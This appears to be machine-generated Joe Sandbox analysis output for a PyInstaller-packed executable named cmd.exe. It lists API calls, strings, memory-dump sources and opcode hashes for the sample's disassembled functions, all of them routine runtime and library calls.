                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131D323B1868692F720B761EC416E6A294BF887D4FC14172EE8D83795EF3CE5468710
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                      • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                      • Instruction ID: 22c78a12bc30a8906687766600572ab6426f8270504b2ba1bbcf261f7f72a8d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE311C63619A8289FB20FF61EC556F9A360FF88784F940175EA4D87B59DF3CE1058720
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF70AEF918F,?,00007FF70AEF3C55), ref: 00007FF70AEF2BA0
                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF70AEF2C2A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                      • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                      • Instruction ID: 9ced47fdc60e486b87ab5ed360c8b5c69843c99d26ab19b72c2ce5bde0344bde
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0219F63708B4182F620EB14F8457EAB3A4EF88784F804136EA8D97755DF3CE605C710
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF70AEF1B99), ref: 00007FF70AEF2760
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                      • Instruction ID: fe99d0e221ee02b96bc3db454a5df5a87a99ed05ba96d71ca1fe15687e6c4f9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22217F73A1878682F620EB51F8417E6A394EF88384F800175EA8C43759DF7CE5458750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                      • Instruction ID: 7365c7fd6484a1f6575abeb10856d5e041908d40f751d4fdb38c89511f200e69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0C263B0870681FB10AB24EC857799320EF49761FC406B5CA6E462E4DF2CF244C320
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                      • Instruction ID: b7f261f52d7e68346e2de06795a83c56d642d4e0f3b57b87f360d0d87c195c49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9114F63F5CA1301F6747124ECF6375A0447F59364E888AB4EA7E067DA8FACF94141E4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B41F
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B43E
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B466
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B477
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF0A613,?,?,00000000,00007FF70AF0A8AE,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0B488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                      • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                      • Instruction ID: 512bef3470ef55ed39361f446a20dadbf207a56bc99f2d89b64f5fdfa67b4598
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E117C26F0C60281FA68BB21DE51979E1465F847B0FD883B4E83D866D6DF2CF9018320
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3702945584-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF70AEF352C,?,00000000,00007FF70AEF3F23), ref: 00007FF70AEF7F22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                      • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                      • Instruction ID: e6d8ffa678aefedd6ecf55b23c6f8e9544d91364f54e3045387ec137362d1bcc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C931D223619AC645FA21BB20EC517EAA354EF84BE4FC44271EA6D437C9DF3CE6458710
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                      • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                      • Instruction ID: 577300b563743897b293d8ec270cd96a1726ddefebb4172232cfd68420051a18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8217F63B08B4192F620EB54F8457EAB3A4EF88784F804136EA8D97755DF3CE649C750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                      • Instruction ID: e3439b7ebad138d05f08ed68bc43589925fa6b3bb7cfb0cd78a6bec946f5cce5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD1F073B08A818AFB10DF65D8406ACB7A1EB44798F808275DE5E97B99DF38E016C350
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                      • Instruction ID: 2ecdab026bf0ae0ec72edd5e9961e9064bbd2af6c9b963bdcd6094df18156d10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0351D673F081128AFB24EF24DD55ABCA7A1AF40358F914175DE1E92AE5DB3CF4428710
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                      • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                      • Instruction ID: f7d472fa0ab7fb858e34d7b51508e409ea92aef7c086cba2f52aa53d7f71aaf8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A51AD23E086418AFB10EF71D8507BDA3A1BF48B98F948475DE0D97688DF78E441CB20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                      • Instruction ID: 67ec9ca8c9aac5dac2240bcafed91b841ab397454d372b8cfc6c479855f0ae3b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11CC23F1C14782FA54BB69ED452FA9251EF88780FC48170DB4907B99CF3DE9D58614
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF090B6
  • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
  • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF70AEFCC15), ref: 00007FF70AF090D4
Strings
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\cmd.exe
• API String ID: 3580290477-1295598952
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
Strings
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
                                                                                                                                                                                                                                      • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                      • Instruction ID: 7e48712c4139e80ea67360a01ad329de592c93811834805290254f6a9369c430
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35014F23A1C20786FB20BF60D86627EA3A0EF48789FD50076D65D86795DF2CF5448B24
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
